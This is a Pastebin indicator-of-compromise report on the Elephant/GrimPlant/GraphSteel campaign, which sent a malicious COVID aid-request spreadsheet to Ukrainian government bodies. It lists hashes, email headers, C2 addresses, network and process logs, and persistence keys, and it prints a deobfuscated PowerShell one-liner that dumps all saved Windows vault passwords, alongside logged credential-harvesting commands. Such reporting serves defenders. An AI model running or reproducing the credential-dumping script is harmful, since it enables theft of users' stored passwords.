API tools faq
paste
VRad

#elephant_hobot_280422

VRad
Apr 28th, 2022 (edited)
321
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.52 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #Elephant #GrimPlant #GraphSteel #Hobot
  2.  
  3. https://pastebin.com/Z9PLqtpE
  4.  
  5. previous_contact: n/a
  6.  
  7. FAQ:
  8. https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/
  9. https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/
  10. https://cert.gov.ua/article/39882
  11. https://excelvba.ru/code/tools/Attachments
  12. https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel
  13. https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant
  14.  
  15. attack_vector
  16. --------------
  17. email > XLS > VBA > extract EXE1 (base64) > get EXE2 > get EXE3 > get EXE4 > exfil to 212.192.246.115
  18.  
  19.  
  20. # # # # # # # #
  21. email_headers
  22. # # # # # # # #
  23.  
  24. Received: from mail3.nest.vn.ua ([193.243.158.20])
  25. Received: from WINR8K088HRVJH (unknown [87.249.139.170]) by mail3.nest.vn.ua (Postfix) with ESMTPSA id F265D342979
  26. From: "trembitskyy@vndsp.gov.ua" <trembitskyy@vndsp.gov.ua>
  27. X-Mailer: Smart_Send_4_4_2
  28. Date: Thu, 28 Apr 2022 01:46:40 +0300
  29. Message-ID: <7304491317264122489710@WIN-R8K088HRVJH>
  30.  
  31.  
  32. # # # # # # # #
  33. files
  34. # # # # # # # #
  35.  
  36. SHA-256 8cdd84285c936da43cf7c4506b6372a4806b0a90d3db29a72eaa7626dc83896b First Submission 2022-04-26 07:12:50 UTC
  37. File name Aid request COVID-19-04_5_22--.xls [ MS Excel Spreadsheet + SheetForAttachedFiles]
  38. File size 9.44 MB (9897472 bytes)
  39.  
  40. SHA-256 ed448b9c4e604c7c6531864ac023cdd8865affab409d581db66281179532fc69 First Submission 2022-04-26 07:37:22 UTC
  41. File name base_update.exe _dropper_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
  42. File size 4.29 MB (4499408 bytes)
  43.  
  44. SHA-256 f2a09b611b6fca3e82b8c3098abc35929779685a9e3f851a6acf4040be002f41 First Submission 2022-04-22 15:49:06 UTC
  45. File name java-sdk.exe _downloader_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
  46. File size 5.90 MB (6191616 bytes)
  47.  
  48. SHA-256 aca731d34c3e99d07af79847db369409e92e387520e44285608f18877b3a1d79 First Submission 2022-04-26 07:53:56 UTC
  49. File name oracle-java.exe _implant_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
  50. File size 9.55 MB (10016256 bytes)
  51.  
  52. SHA-256 47a734e624dac47b9043606c8833001dde8f341d71f77129da2eade4e02b3878 First Submission 2022-04-24 14:03:56 UTC
  53. File name microsoft-cortana.exe _client_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
  54. File size 9.04 MB (9481728 bytes)
  55.  
  56.  
  57. # # # # # # # #
  58. activity
  59. # # # # # # # #
  60.  
  61. PL_SCR 212.192.246.115/i - get downloader java-sdk.exe
  62. 212.192.246.115/p - get implant oracle-java.exe
  63. 212.192.246.115/m - get client microsoft-cortana.exe
  64.  
  65. C2 212.192.246.115/c
  66.  
  67.  
  68. netwrk
  69. --------------
  70. 212.192.246.115 212.192.246.115:443 443 HTTP GET /i HTTP/1.1 -hobot-
  71. 212.192.246.115 212.192.246.115:443 443 HTTP GET /p HTTP/1.1 -hobot-
  72. 212.192.246.115 212.192.246.115:443 443 HTTP GET /m HTTP/1.1 -hobot-
  73.  
  74. 3.220.57.224 api.ipify.org 443 TLSv1 Client Hello
  75.  
  76. 212.192.246.115 212.192.246.115:443 443 HTTP GET /c HTTP/1.1 -hobot-
  77.  
  78.  
  79. comp
  80. --------------
  81. base_update.exe 2952 212.192.246.115 443 ESTABLISHED
  82. java-sdk.exe 3684 212.192.246.115 443 ESTABLISHED
  83. oracle-java.exe 1088 212.192.246.115 80 ESTABLISHED
  84. oracle-java.exe 1088 3.220.57.224 443 ESTABLISHED
  85. microsoft-cortana.exe 1412 212.192.246.115 443 ESTABLISHED
  86. microsoft-cortana.exe 1412 3.220.57.224 443 ESTABLISHED
  87. oracle-java.exe 1088 212.192.246.115 80 ESTABLISHED
  88.  
  89.  
  90. proc
  91. --------------
  92. C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
  93. C:\tmp\base_update.exe
  94. C:\Users\operator/.java-sdk/java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==
  95. C:\Users\operator/.java-sdk/oracle-java.exe -addr YdlP+kKrV+icT7cT1PCcwA==
  96. C:\Users\operator/.java-sdk/microsoft-cortana.exe -addr YdlP+kKrV+icT7cT1PCcwA==
  97. C:\Windows\system32\cmd.exe /Q /C netsh wlan show profiles
  98. C:\Windows\system32\netsh.exe wlan show profiles
  99. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /Q /C -encodedCommand WwB2AG8AaQBkAF0AWwBXA...
  100. C:\Windows\system32\cmd.exe /Q /C powershell reg query HKCU\Software\SimonTatham\Putty\Sessions
  101. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe reg query HKCU\Software\SimonTatham\Putty\Sessions
  102. C:\Windows\system32\reg.exe query HKCU\Software\SimonTatham\Putty\Sessions
  103. . . .
  104.  
  105. persist
  106. --------------
  107. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28.04.2022 16:24
  108. Java-SDK c:\users\operator\.java-sdk\java-sdk.exe 01.01.1970 3:00
  109. C:\Users\operator\.java-sdk\java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==
  110.  
  111.  
  112. drop
  113. --------------
  114. %tmp%\base_update.exe
  115. %tmp%\prefix954622903
  116. %tmp%\prefix...
  117.  
  118. C:\Users\%user%\.java-sdk\java-sdk.exe
  119. C:\Users\%user%\.java-sdk\microsoft-cortana.exe
  120. C:\Users\%user%\.java-sdk\oracle-java.exe
  121.  
  122.  
  123. # # # # # # # #
  124. additional info
  125. # # # # # # # #
  126.  
  127. xls metadata
  128. --------------
  129. File Name : Aid request COVID-19-04_5_22--.xls
  130. Directory : .
  131. File Size : 9.4 MiB
  132. File Modification Date/Time : 2022:04:28 09:35:09+03:00
  133. File Access Date/Time : 2022:04:28 16:22:14+03:00
  134. File Inode Change Date/Time : 2022:04:28 16:22:05+03:00
  135. File Permissions : -rw-rw-r--
  136. File Type : XLS
  137. File Type Extension : xls
  138. MIME Type : application/vnd.ms-excel
  139. Title :
  140. Subject :
  141. Author : Apache POI
  142. Comments :
  143. Template :
  144. Last Modified By : Пользователь
  145. Revision Number : 1
  146. Software : Microsoft Excel
  147. Total Edit Time : 1.0 minutes
  148. Create Date : 2020:04:30 13:56:23
  149. Modify Date : 2022:04:21 18:56:05
  150. Security : Password protected
  151. App Version : 16.0000
  152. Scale Crop : No
  153. Links Up To Date : No
  154. Shared Doc : No
  155. Hyperlinks Changed : No
  156. Title Of Parts : All request, Ministry of Defense, Updating data, Ministry of Economy, Ministry of Education%Science, Ministry of Energy&Environment, Ministry of Finance, Ministry of Health, Ministry of Infrastructure, Ministry of Internal Affairs, Ministry of Justice, Ministry of Reintegration, Ministry of Social Policy, National Guard, National Police, State Audit Service, State Border Guard Service, State Customs Service, State Emergency Service, State Fiscal Service, State Security Service, State Service of Special Commun, State Service for Geodesy, State Tax Service
  157. Heading Pairs : Листы, 24
  158. Code Page : Windows Cyrillic
  159. Direction : EngRus**
  160. Translated : -1
  161. Comp Obj User Type Len : 27
  162. Comp Obj User Type : .���� Microsoft Excel 2003
  163.  
  164.  
  165. powershell decoded & deobfuscated
  166. ----------------------------------
  167. [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() | % { $_.RetrievePassword();$_} | Select UserName, Resource, Password | Format-Table -HideTableHeaders
  168.  
  169.  
  170. # # # # # # # #
  171. VT & Intezer
  172. # # # # # # # #
  173.  
  174. Dropped files
  175. **************
  176. https://www.virustotal.com/gui/file/8cdd84285c936da43cf7c4506b6372a4806b0a90d3db29a72eaa7626dc83896b/details
  177. https://www.virustotal.com/gui/file/ed448b9c4e604c7c6531864ac023cdd8865affab409d581db66281179532fc69/details
  178. https://analyze.intezer.com/analyses/7352b66e-04e6-4b8a-b0b6-97443570103e
  179. https://www.virustotal.com/gui/file/f2a09b611b6fca3e82b8c3098abc35929779685a9e3f851a6acf4040be002f41/details
  180. https://analyze.intezer.com/analyses/113ed91f-51cf-4a7d-abc7-d4a61e03bf03
  181. https://www.virustotal.com/gui/file/aca731d34c3e99d07af79847db369409e92e387520e44285608f18877b3a1d79/details
  182. https://analyze.intezer.com/analyses/4662ac0b-a3a2-4259-86c9-875739feb102
  183. https://www.virustotal.com/gui/file/47a734e624dac47b9043606c8833001dde8f341d71f77129da2eade4e02b3878/details
  184. https://analyze.intezer.com/analyses/ae7a608e-c54c-4e19-a2fb-c217646c4e3b
  185.  
  186. PL_SCR
  187. **************
  188. https://www.virustotal.com/gui/ip-address/212.192.246.115/details
  189.  
  190. C2
  191. **************
  192. https://www.virustotal.com/gui/ip-address/212.192.246.115/details
  193.  
  194. VR
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!